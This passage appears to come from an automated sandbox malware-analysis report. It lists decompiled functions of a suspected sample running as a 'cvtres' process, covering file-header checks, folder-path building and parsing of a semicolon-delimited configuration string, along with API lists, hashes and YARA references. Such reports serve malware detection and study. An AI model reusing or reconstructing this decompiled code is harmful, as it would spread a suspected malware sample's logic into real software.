								ReadFile(_t126,  &_v96, 4,  &_v72, _t125);
								_t112 = _v96;
								if(_t112 == 0x5a4d || _t112 == 0x454e || _t112 == 0x454c || _t112 == 0x4550) {
									_v64 = _v64 | 0x00400000;
								}
							}
						}
					}
					_t87 = _v92;
					if(_t87 != _t125) {
						 *_t87 = _v64;
					}
					_t88 = _v84;
					if(_t88 != _t125) {
						 *_t88 = _v76;
					}
					if(_t113 != _t125) {
						 *_t113 = E0041BD2C(_v60.ftLastAccessTime, _v44);
						_t113[1] = _t124;
						_t113[2] = E0041BD2C(_v60.ftLastWriteTime, _v36);
						_t113[3] = _t124;
						_t113[4] = E0041BD2C(_v60.ftCreationTime, _v52);
						_t113[5] = _t124;
					}
					_t113 = _v88;
					if(_t113 != _t125) {
						_push(_v36);
						_t125 =  &_v64;
						_t126 =  &_v68;
						E0041BD4E( &_v64,  &_v68, _v60.ftLastWriteTime);
						 *_t113 = (_v68 & 0x0000ffff) << 0x00000010 | _v64 & 0x0000ffff;
					}
					_t89 = 0;
					goto L34;
				} else {
					_t89 = 0x200;
					L34:
					return E0041DA9B(_t89, _t113, _v8 ^ _t127, _t124, _t125, _t126);
				}
			}
































                                                                    0x0041bdb5
                                                                    0x0041bdbb
                                                                    0x0041bdc2
                                                                    0x0041bdc8
                                                                    0x0041bdd0
                                                                    0x0041bdd7
                                                                    0x0041bddd
                                                                    0x0041bde1
                                                                    0x0041bdeb
                                                                    0x0041bdf7
                                                                    0x0041bdfc
                                                                    0x0041bdff
                                                                    0x0041be02
                                                                    0x0041be02
                                                                    0x0041be05
                                                                    0x0041be08
                                                                    0x0041be0a
                                                                    0x0041be0a
                                                                    0x0041be10
                                                                    0x0041be12
                                                                    0x0041be12
                                                                    0x0041be19
                                                                    0x0041be1b
                                                                    0x0041be1b
                                                                    0x0041be21
                                                                    0x0041be24
                                                                    0x0041be26
                                                                    0x0041be26
                                                                    0x0041be2d
                                                                    0x0041be2f
                                                                    0x0041be2f
                                                                    0x0041be35
                                                                    0x0041be40
                                                                    0x0041be37
                                                                    0x0041be37
                                                                    0x0041be37
                                                                    0x0041be47
                                                                    0x0041be51
                                                                    0x0041be53
                                                                    0x0041be53
                                                                    0x0041be5c
                                                                    0x0041be62
                                                                    0x0041be68
                                                                    0x0041be72
                                                                    0x0041be84
                                                                    0x0041be8f
                                                                    0x0041bea1
                                                                    0x0041beb0
                                                                    0x0041beb2
                                                                    0x0041bebb
                                                                    0x0041bec1
                                                                    0x0041bed3
                                                                    0x0041bed9
                                                                    0x0041bee1
                                                                    0x0041bef8
                                                                    0x0041bef8
                                                                    0x0041bee1
                                                                    0x0041bebb
                                                                    0x0041beb0
                                                                    0x0041beff
                                                                    0x0041bf04
                                                                    0x0041bf09
                                                                    0x0041bf09
                                                                    0x0041bf0b
                                                                    0x0041bf10
                                                                    0x0041bf15
                                                                    0x0041bf15
                                                                    0x0041bf19
                                                                    0x0041bf29
                                                                    0x0041bf2e
                                                                    0x0041bf39
                                                                    0x0041bf3f
                                                                    0x0041bf4a
                                                                    0x0041bf4d
                                                                    0x0041bf4d
                                                                    0x0041bf50
                                                                    0x0041bf55
                                                                    0x0041bf57
                                                                    0x0041bf5a
                                                                    0x0041bf60
                                                                    0x0041bf63
                                                                    0x0041bf77
                                                                    0x0041bf77
                                                                    0x0041bf79
                                                                    0x00000000
                                                                    0x0041bded
                                                                    0x0041bded
                                                                    0x0041bf7b
                                                                    0x0041bf89
                                                                    0x0041bf89

                                                                    APIs
                                                                    • GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041BDE3
                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0041BE5C
                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041BE72
                                                                    • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041BE84
                                                                    • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041BE8F
                                                                    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BEA1
                                                                    • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041BEC1
                                                                    • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BED3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$PointerRead$HandleInformationSize
                                                                    • String ID:
                                                                    • API String ID: 2979504256-3916222277
                                                                    • Opcode ID: 9cb83fd6e66bf42e0ea93347eca92141613ad83602980230ebbcfd3161814d6c
                                                                    • Instruction ID: da7114c1862363709ce54fdb090f57f1f79d446b9b0ab90a52d138025d07637a
                                                                    • Opcode Fuzzy Hash: 9cb83fd6e66bf42e0ea93347eca92141613ad83602980230ebbcfd3161814d6c
                                                                    • Instruction Fuzzy Hash: EE517B71D00218AFDB19DF99DC85AEEBBB5FF49700F14402AF601E6261D7389981CFA8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041497A Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 89%
                                                                    			E0041497A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				void* _t23;
				intOrPtr _t38;
				void* _t43;

				_push(0x14);
				E004207D5(E004338D8, __ebx, __edi, __esi);
				E0041D5BD(_t43 - 0x14, 0);
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t38 =  *0x446728; // 0x0
				 *((intOrPtr*)(_t43 - 0x10)) = _t38;
				_t19 = E0040E116( *((intOrPtr*)(_t43 + 8)), E0040E063(_t43 - 0x14, 0x456f38));
				_t42 = _t19;
				if(_t19 == 0) {
					if(_t38 == 0) {
						_push( *((intOrPtr*)(_t43 + 8)));
						_t23 = E00414A4B(_t43 - 0x10, _t42, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E0041DC67(_t43 - 0x20, "bad cast");
							E0041FF86(_t43 - 0x20, 0x440cfc);
						}
						_t42 =  *((intOrPtr*)(_t43 - 0x10));
						 *0x446728 =  *((intOrPtr*)(_t43 - 0x10));
						E0040E094( *((intOrPtr*)(_t43 - 0x10)));
						E0041D21C(__eflags, _t42);
					} else {
						_t42 = _t38;
					}
				}
				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
				E0041D5E5(_t43 - 0x14);
				return E00420874(_t42);
			}







                                                                    0x0041497a
                                                                    0x00414981
                                                                    0x0041498b
                                                                    0x00414990
                                                                    0x00414994
                                                                    0x0041499f
                                                                    0x004149ac
                                                                    0x004149b1
                                                                    0x004149b5
                                                                    0x004149b9
                                                                    0x004149bf
                                                                    0x004149c5
                                                                    0x004149cb
                                                                    0x004149ce
                                                                    0x004149d8
                                                                    0x004149e6
                                                                    0x004149e6
                                                                    0x004149eb
                                                                    0x004149f0
                                                                    0x004149f6
                                                                    0x004149fc
                                                                    0x004149bb
                                                                    0x004149bb
                                                                    0x004149bb
                                                                    0x004149b9
                                                                    0x00414a02
                                                                    0x00414a09
                                                                    0x00414a15

                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00414981
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0041498B
                                                                      • Part of subcall function 0040E063: std::_Lockit::_Lockit.LIBCPMT ref: 0040E071
                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 004149D8
                                                                    • __CxxThrowException@8.LIBCMT ref: 004149E6
                                                                    • std::locale::facet::_Incref.LIBCPMT ref: 004149F6
                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 004149FC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
                                                                    • String ID: 8oE$bad cast
                                                                    • API String ID: 158301680-3540328213
                                                                    • Opcode ID: af14d10a6f90571a5d564b4f279d6e9e662d9b7295b4f032a6ec7bb26ff750a4
                                                                    • Instruction ID: 7dfa32ef5742560436fe47dadaaff3196923bb6f2707543519836ec9562e1b44
                                                                    • Opcode Fuzzy Hash: af14d10a6f90571a5d564b4f279d6e9e662d9b7295b4f032a6ec7bb26ff750a4
                                                                    • Instruction Fuzzy Hash: 4201A171E4022497CB00EB65D8426EE76606F44768F51066BF410772D1EB7C9E4587DD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418678 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 89%
                                                                    			E00418678(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				void* _t23;
				intOrPtr _t39;
				void* _t44;

				_push(0x14);
				E004207D5(E004338D8, __ebx, __edi, __esi);
				E0041D5BD(_t44 - 0x14, 0);
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				_t39 =  *0x44672c; // 0x4be15b8
				 *((intOrPtr*)(_t44 - 0x10)) = _t39;
				_t19 = E0040E116( *((intOrPtr*)(_t44 + 8)), E0040E063(_t44 - 0x14, 0x456f3c));
				_t43 = _t19;
				if(_t19 == 0) {
					if(_t39 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_t23 = E004187B0(_t44 - 0x10, __edx, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E0041DC67(_t44 - 0x20, "bad cast");
							E0041FF86(_t44 - 0x20, 0x440cfc);
						}
						_t43 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x44672c =  *((intOrPtr*)(_t44 - 0x10));
						E0040E094( *((intOrPtr*)(_t44 - 0x10)));
						E0041D21C(__eflags, _t43);
					} else {
						_t43 = _t39;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0041D5E5(_t44 - 0x14);
				return E00420874(_t43);
			}







                                                                    0x00418678
                                                                    0x0041867f
                                                                    0x00418689
                                                                    0x0041868e
                                                                    0x00418692
                                                                    0x0041869d
                                                                    0x004186aa
                                                                    0x004186af
                                                                    0x004186b3
                                                                    0x004186b7
                                                                    0x004186bd
                                                                    0x004186c3
                                                                    0x004186c9
                                                                    0x004186cc
                                                                    0x004186d6
                                                                    0x004186e4
                                                                    0x004186e4
                                                                    0x004186e9
                                                                    0x004186ee
                                                                    0x004186f4
                                                                    0x004186fa
                                                                    0x004186b9
                                                                    0x004186b9
                                                                    0x004186b9
                                                                    0x004186b7
                                                                    0x00418700
                                                                    0x00418707
                                                                    0x00418713

                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0041867F
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00418689
                                                                      • Part of subcall function 0040E063: std::_Lockit::_Lockit.LIBCPMT ref: 0040E071
                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 004186D6
                                                                    • __CxxThrowException@8.LIBCMT ref: 004186E4
                                                                    • std::locale::facet::_Incref.LIBCPMT ref: 004186F4
                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 004186FA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
                                                                    • String ID: <oE$bad cast
                                                                    • API String ID: 158301680-3489866858
                                                                    • Opcode ID: e64cfd71f690377aa4d18cf06f4c0f58cd48746f6fe212d3e73d2cc5178f4212
                                                                    • Instruction ID: 3ad4f98fd10a7e7e96103baa1278d85e7d0709abde918220fe342f3cf83fce33
                                                                    • Opcode Fuzzy Hash: e64cfd71f690377aa4d18cf06f4c0f58cd48746f6fe212d3e73d2cc5178f4212
                                                                    • Instruction Fuzzy Hash: D401A175E0022497CB01EB65CC426EDB6606F44328F61026FF420B72D1EB7C9E4587DD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00418714 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 89%
                                                                    			E00418714(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t19;
				void* _t23;
				intOrPtr _t38;
				void* _t43;

				_push(0x14);
				E004207D5(E004338D8, __ebx, __edi, __esi);
				E0041D5BD(_t43 - 0x14, 0);
				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
				_t38 =  *0x446730; // 0x4be15e0
				 *((intOrPtr*)(_t43 - 0x10)) = _t38;
				_t19 = E0040E116( *((intOrPtr*)(_t43 + 8)), E0040E063(_t43 - 0x14, 0x456f40));
				_t42 = _t19;
				if(_t19 == 0) {
					if(_t38 == 0) {
						_push( *((intOrPtr*)(_t43 + 8)));
						_t23 = E00418835(_t43 - 0x10, _t42, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E0041DC67(_t43 - 0x20, "bad cast");
							E0041FF86(_t43 - 0x20, 0x440cfc);
						}
						_t42 =  *((intOrPtr*)(_t43 - 0x10));
						 *0x446730 =  *((intOrPtr*)(_t43 - 0x10));
						E0040E094( *((intOrPtr*)(_t43 - 0x10)));
						E0041D21C(__eflags, _t42);
					} else {
						_t42 = _t38;
					}
				}
				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
				E0041D5E5(_t43 - 0x14);
				return E00420874(_t42);
			}







                                                                    0x00418714
                                                                    0x0041871b
                                                                    0x00418725
                                                                    0x0041872a
                                                                    0x0041872e
                                                                    0x00418739
                                                                    0x00418746
                                                                    0x0041874b
                                                                    0x0041874f
                                                                    0x00418753
                                                                    0x00418759
                                                                    0x0041875f
                                                                    0x00418765
                                                                    0x00418768
                                                                    0x00418772
                                                                    0x00418780
                                                                    0x00418780
                                                                    0x00418785
                                                                    0x0041878a
                                                                    0x00418790
                                                                    0x00418796
                                                                    0x00418755
                                                                    0x00418755
                                                                    0x00418755
                                                                    0x00418753
                                                                    0x0041879c
                                                                    0x004187a3
                                                                    0x004187af

                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0041871B
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00418725
                                                                      • Part of subcall function 0040E063: std::_Lockit::_Lockit.LIBCPMT ref: 0040E071
                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 00418772
                                                                    • __CxxThrowException@8.LIBCMT ref: 00418780
                                                                    • std::locale::facet::_Incref.LIBCPMT ref: 00418790
                                                                    • std::locale::facet::_Facet_Register.LIBCPMT ref: 00418796
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
                                                                    • String ID: @oE$bad cast
                                                                    • API String ID: 158301680-4047759391
                                                                    • Opcode ID: 4d8b436ed37fb1d6c80e8963dd5f7f08f93c7286953596e0642b70bb6cc5bb3b
                                                                    • Instruction ID: f9aee639c2379cdf8ef5bd9fece0c91fa23d90cd98dfe83eb1ebeff7589e9246
                                                                    • Opcode Fuzzy Hash: 4d8b436ed37fb1d6c80e8963dd5f7f08f93c7286953596e0642b70bb6cc5bb3b
                                                                    • Instruction Fuzzy Hash: DC018E31D4022597CB00EB65DC826EE72706B40328F61066FF820772D2EF7C9E45879D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00412B55 Relevance: 13.6, APIs: 9, Instructions: 126stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 93%
                                                                    			E00412B55(void* __ebx, CHAR* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t71;
				WCHAR* _t77;
				signed char _t78;
				intOrPtr _t95;
				intOrPtr _t102;
				CHAR* _t104;
				void* _t110;
				intOrPtr _t112;
				void* _t115;

				_t102 = __edx;
				_push(0x264);
				E0042083E(E00434DCE, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t115 - 0x26c)) =  *((intOrPtr*)(_t115 + 8));
				_t92 = 0;
				 *((intOrPtr*)(_t115 - 0x264)) =  *((intOrPtr*)(_t115 + 0xc));
				_t104 = __ecx;
				 *((intOrPtr*)(_t115 - 0x260)) = 0;
				 *((intOrPtr*)(_t115 - 0x25c)) = 0;
				E00426300(_t115 - 0x220, 0, 0x104);
				lstrcatA(_t115 - 0x220, E00416617(0, _t104, 0x104, 0x1c));
				lstrcatA(_t115 - 0x220, _t104);
				E00426300(_t115 - 0x118, 0, 0x104);
				lstrcatA(_t115 - 0x118, _t115 - 0x220);
				lstrcatA(_t115 - 0x118, 0x43c8e0);
				lstrcatA(_t115 - 0x118,  *0x445cec);
				_t71 = _t115 - 0x118;
				 *((intOrPtr*)(_t115 - 0x228)) = 0xf;
				 *((intOrPtr*)(_t115 - 0x22c)) = 0;
				 *((char*)(_t115 - 0x23c)) = 0;
				_t110 = _t71 + 1;
				do {
					_t95 =  *_t71;
					_t71 = _t71 + 1;
					_t121 = _t95;
				} while (_t95 != 0);
				E00404396(_t115 - 0x23c, _t121, _t115 - 0x118, _t71 - _t110);
				 *(_t115 - 4) = 0;
				_t77 = E004160E8(_t115 - 0x23c, _t115 - 0x258);
				if(_t77[0xa] >= 8) {
					_t77 =  *_t77;
				}
				_t78 = GetFileAttributesW(_t77);
				if(_t78 == 0xffffffff) {
					L6:
					 *((intOrPtr*)(_t115 - 0x268)) = _t92;
					goto L7;
				} else {
					 *((intOrPtr*)(_t115 - 0x268)) = 1;
					if((_t78 & 0x00000010) == 0) {
						L7:
						_t111 = _t115 - 0x258;
						E0040C148(0, _t115 - 0x258, 1);
						 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
						E00404354(_t115 - 0x23c, 1, _t92);
						_t125 =  *((intOrPtr*)(_t115 - 0x268)) - _t92;
						if( *((intOrPtr*)(_t115 - 0x268)) != _t92) {
							_push(_t115 - 0x25c);
							_push(_t115 - 0x118);
							if(E0040E6CB(_t92, _t115 - 0x260, 0, _t111, _t125) == 0) {
								E0040E631(_t115 - 0x260, _t115 - 0x25c);
							}
						}
						_t112 =  *((intOrPtr*)(_t115 - 0x26c));
						E004101E9(_t112, _t102, 0x43c8d8, _t115 - 0x220,  *((intOrPtr*)(_t115 - 0x264)),  *((intOrPtr*)(_t115 - 0x260)),  *((intOrPtr*)(_t115 - 0x25c)),  *((intOrPtr*)(_t112 + 0x20)));
						if( *((intOrPtr*)(_t112 + 6)) != _t92) {
							_t92 = 0;
							E00412592(0, _t112, _t115 - 0x220,  *((intOrPtr*)(_t115 - 0x264)));
						}
						E0040E631(_t115 - 0x260, _t115 - 0x25c);
						return E00420888(_t92, _t115 - 0x260, _t115 - 0x25c);
					}
					goto L6;
				}
			}












                                                                    0x00412b55
                                                                    0x00412b55
                                                                    0x00412b5f
                                                                    0x00412b67
                                                                    0x00412b70
                                                                    0x00412b78
                                                                    0x00412b86
                                                                    0x00412b88
                                                                    0x00412b8e
                                                                    0x00412b94
                                                                    0x00412bac
                                                                    0x00412bba
                                                                    0x00412bc9
                                                                    0x00412bdf
                                                                    0x00412bf1
                                                                    0x00412c04
                                                                    0x00412c0a
                                                                    0x00412c10
                                                                    0x00412c1a
                                                                    0x00412c20
                                                                    0x00412c26
                                                                    0x00412c29
                                                                    0x00412c29
                                                                    0x00412c2b
                                                                    0x00412c2c
                                                                    0x00412c2c
                                                                    0x00412c40
                                                                    0x00412c52
                                                                    0x00412c55
                                                                    0x00412c5e
                                                                    0x00412c60
                                                                    0x00412c60
                                                                    0x00412c63
                                                                    0x00412c6c
                                                                    0x00412c7c
                                                                    0x00412c7c
                                                                    0x00000000
                                                                    0x00412c6e
                                                                    0x00412c6e
                                                                    0x00412c7a
                                                                    0x00412c82
                                                                    0x00412c86
                                                                    0x00412c8c
                                                                    0x00412c91
                                                                    0x00412c9e
                                                                    0x00412ca3
                                                                    0x00412ca9
                                                                    0x00412cb1
                                                                    0x00412cb8
                                                                    0x00412cc8
                                                                    0x00412cd6
                                                                    0x00412cd6
                                                                    0x00412cc8
                                                                    0x00412cdb
                                                                    0x00412d04
                                                                    0x00412d0c
                                                                    0x00412d1c
                                                                    0x00412d1e
                                                                    0x00412d1e
                                                                    0x00412d2f
                                                                    0x00412d39
                                                                    0x00412d39
                                                                    0x00000000
                                                                    0x00412c7a

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 00412B5F
                                                                    • _memset.LIBCMT ref: 00412B94
                                                                      • Part of subcall function 00416617: _memset.LIBCMT ref: 00416638
                                                                      • Part of subcall function 00416617: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00416650
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?), ref: 00412BAC
                                                                    • lstrcatA.KERNEL32(?), ref: 00412BBA
                                                                    • _memset.LIBCMT ref: 00412BC9
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00412BDF
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00412BF1
                                                                    • lstrcatA.KERNEL32(?), ref: 00412C04
                                                                    • GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00412C63
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$_memset$AttributesFileFolderH_prolog3_Path
                                                                    • String ID:
                                                                    • API String ID: 1831167774-0
                                                                    • Opcode ID: cab01a1e6d47939782eea1689fca3bbf74bf115935c7c8798f5f1d7bc8c884a5
                                                                    • Instruction ID: 456868ecc7fe72aca583386d7c43b07fb5f78c5d0a1a51232e47ff6962ed81d3
                                                                    • Opcode Fuzzy Hash: cab01a1e6d47939782eea1689fca3bbf74bf115935c7c8798f5f1d7bc8c884a5
                                                                    • Instruction Fuzzy Hash: 1B51207280122CAEDF20EBA1DC89ADEB778AB09314F1045EAE509E3151DB759FC5CF58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409E88 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 77%
                                                                    			E00409E88() {
				signed int _v8;
				char _v5012;
				char _v10012;
				char _v25012;
				char _v75012;
				char _v125012;
				char _v125016;
				char _v125020;
				intOrPtr _v125024;
				intOrPtr _v125028;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t36;
				intOrPtr _t38;
				char* _t39;
				char* _t40;
				char* _t41;
				char* _t42;
				char* _t43;
				char* _t49;
				void* _t52;
				char* _t53;
				CHAR* _t54;
				void* _t58;
				char* _t59;
				void* _t60;
				char* _t61;
				void* _t62;
				void* _t64;
				signed int _t65;
				char* _t67;
				char _t73;
				void* _t74;
				void* _t75;
				char _t76;
				void* _t77;
				intOrPtr _t78;
				void* _t81;
				void* _t82;
				intOrPtr _t83;
				void* _t85;
				CHAR* _t92;
				signed int _t93;
				void* _t94;
				void* _t95;

				E0042E300(0x1e864);
				_t36 =  *0x443674; // 0x393162b1
				_v8 = _t36 ^ _t93;
				_t38 =  *0x4461f0; // 0x0
				_t87 =  *0x4461e0; // 0x0
				_t88 = 0xc350;
				_v125024 = _t38;
				_t73 = 0xc350;
				_t39 =  &_v75012;
				do {
					 *_t39 = 0;
					_t39 = _t39 + 1;
					_t73 = _t73 - 1;
				} while (_t73 != 0);
				_t74 = 0x1388;
				_t40 =  &_v10012;
				do {
					 *_t40 = 0;
					_t40 = _t40 + 1;
					_t74 = _t74 - 1;
				} while (_t74 != 0);
				_t75 = 0x1388;
				_t41 =  &_v5012;
				do {
					 *_t41 = 0;
					_t41 = _t41 + 1;
					_t75 = _t75 - 1;
				} while (_t75 != 0);
				_t76 = 0xc350;
				_t42 =  &_v125012;
				do {
					 *_t42 = 0;
					_t42 = _t42 + 1;
					_t76 = _t76 - 1;
				} while (_t76 != 0);
				_t77 = 0x3a98;
				_t43 =  &_v25012;
				do {
					 *_t43 = 0;
					_t43 = _t43 + 1;
					_t77 = _t77 - 1;
				} while (_t77 != 0);
				lstrcatA( &_v75012, _t87);
				_t92 = E0041E87C(0, _t87, 0xc350,  &_v75012, ";",  &_v125020);
				_t95 = _t94 + 0xc;
				_v125016 = 1;
				if(_t92 != 0) {
					_t88 = _v125020;
					do {
						_t52 = _v125016 - 1;
						if(_t52 == 0) {
							_t81 = 0x1388;
							_t53 =  &_v10012;
							do {
								 *_t53 = 0;
								_t53 = _t53 + 1;
								_t81 = _t81 - 1;
							} while (_t81 != 0);
							_t54 =  &_v10012;
							goto L32;
						} else {
							_t58 = _t52 - 1;
							if(_t58 == 0) {
								_t82 = 0x1388;
								_t59 =  &_v5012;
								do {
									 *_t59 = 0;
									_t59 = _t59 + 1;
									_t82 = _t82 - 1;
								} while (_t82 != 0);
								_t54 =  &_v5012;
								goto L32;
							} else {
								_t60 = _t58 - 1;
								if(_t60 == 0) {
									_t83 = 0xc350;
									_t61 =  &_v125012;
									do {
										 *_t61 = 0;
										_t61 = _t61 + 1;
										_t83 = _t83 - 1;
									} while (_t83 != 0);
									_t54 =  &_v125012;
									L32:
									lstrcatA(_t54, _t92);
								} else {
									_t62 = _t60 - 1;
									if(_t62 == 0) {
										_push(_t92);
										_v125028 = E0041EA23();
									} else {
										_t64 = _t62 - 1;
										if(_t64 == 0) {
											_t65 =  *0x446458(_t92, "true");
											asm("sbb edi, edi");
											_t88 =  ~_t65 + 1;
										} else {
											if(_t64 == 1) {
												_t85 = 0x3a98;
												_t67 =  &_v25012;
												do {
													 *_t67 = 0;
													_t67 = _t67 + 1;
													_t85 = _t85 - 1;
												} while (_t85 != 0);
												lstrcatA( &_v25012, _t92);
												_t87 =  &_v5012;
												E00409ADF( &_v10012,  &_v5012, _v125028,  &_v125012, _t88, _t92, _v125024);
												_t95 = _t95 + 0x14;
												_v125016 = 0;
											}
										}
									}
								}
							}
						}
						_v125016 = _v125016 + 1;
						_t92 = E0041E87C(0, _t87, _t88, 0, ";",  &_v125020);
						_t95 = _t95 + 0xc;
					} while (_t92 != 0);
				}
				_t78 = 0xc350;
				_t49 =  &_v75012;
				do {
					 *_t49 = 0;
					_t49 = _t49 + 1;
					_t78 = _t78 - 1;
				} while (_t78 != 0);
				return E0041DA9B(_t49, 0, _v8 ^ _t93, _t87, _t88, _t92);
			}

















































                                                                    0x00409e90
                                                                    0x00409e95
                                                                    0x00409e9c
                                                                    0x00409e9f
                                                                    0x00409ea4
                                                                    0x00409ead
                                                                    0x00409eb2
                                                                    0x00409eb8
                                                                    0x00409eba
                                                                    0x00409ec2
                                                                    0x00409ec2
                                                                    0x00409ec4
                                                                    0x00409ec5
                                                                    0x00409ec5
                                                                    0x00409ecd
                                                                    0x00409ecf
                                                                    0x00409ed5
                                                                    0x00409ed5
                                                                    0x00409ed7
                                                                    0x00409ed8
                                                                    0x00409ed8
                                                                    0x00409edb
                                                                    0x00409edd
                                                                    0x00409ee3
                                                                    0x00409ee3
                                                                    0x00409ee5
                                                                    0x00409ee6
                                                                    0x00409ee6
                                                                    0x00409ee9
                                                                    0x00409eeb
                                                                    0x00409ef1
                                                                    0x00409ef1
                                                                    0x00409ef3
                                                                    0x00409ef4
                                                                    0x00409ef4
                                                                    0x00409ef7
                                                                    0x00409efc
                                                                    0x00409f02
                                                                    0x00409f02
                                                                    0x00409f04
                                                                    0x00409f05
                                                                    0x00409f05
                                                                    0x00409f10
                                                                    0x00409f2e
                                                                    0x00409f30
                                                                    0x00409f33
                                                                    0x00409f3f
                                                                    0x00409f45
                                                                    0x00409f4b
                                                                    0x00409f51
                                                                    0x00409f52
                                                                    0x0040a019
                                                                    0x0040a01e
                                                                    0x0040a024
                                                                    0x0040a024
                                                                    0x0040a026
                                                                    0x0040a027
                                                                    0x0040a027
                                                                    0x0040a02a
                                                                    0x00000000
                                                                    0x00409f58
                                                                    0x00409f58
                                                                    0x00409f59
                                                                    0x0040a000
                                                                    0x0040a005
                                                                    0x0040a00b
                                                                    0x0040a00b
                                                                    0x0040a00d
                                                                    0x0040a00e
                                                                    0x0040a00e
                                                                    0x0040a011
                                                                    0x00000000
                                                                    0x00409f5f
                                                                    0x00409f5f
                                                                    0x00409f60
                                                                    0x00409fe7
                                                                    0x00409fec
                                                                    0x00409ff2
                                                                    0x00409ff2
                                                                    0x00409ff4
                                                                    0x00409ff5
                                                                    0x00409ff5
                                                                    0x00409ff8
                                                                    0x0040a030
                                                                    0x0040a032
                                                                    0x00409f66
